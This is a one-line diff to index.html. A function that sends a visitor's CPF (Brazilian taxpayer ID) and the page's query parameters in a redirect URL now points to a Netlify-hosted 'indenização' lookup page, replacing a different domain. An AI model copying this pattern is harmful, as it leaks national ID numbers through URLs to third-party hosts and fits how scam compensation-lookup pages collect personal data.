--- a/index.html
+++ b/index.html
@@ -159,7 +159,7 @@ async function redirecionarComCPF() {
     } else {
         console.error('JSON não encontrado na resposta da API');
     }
-  window.location.href = "https://app.consultaorg.digital/indenizacao?cpf=" + encodeURIComponent(cpf) +
+  window.location.href = "https://consulta-indenizacao.netlify.app/pag2/?cpf=" + encodeURIComponent(cpf) +
         "&" +
       new URLSearchParams(window.location.search);
 }
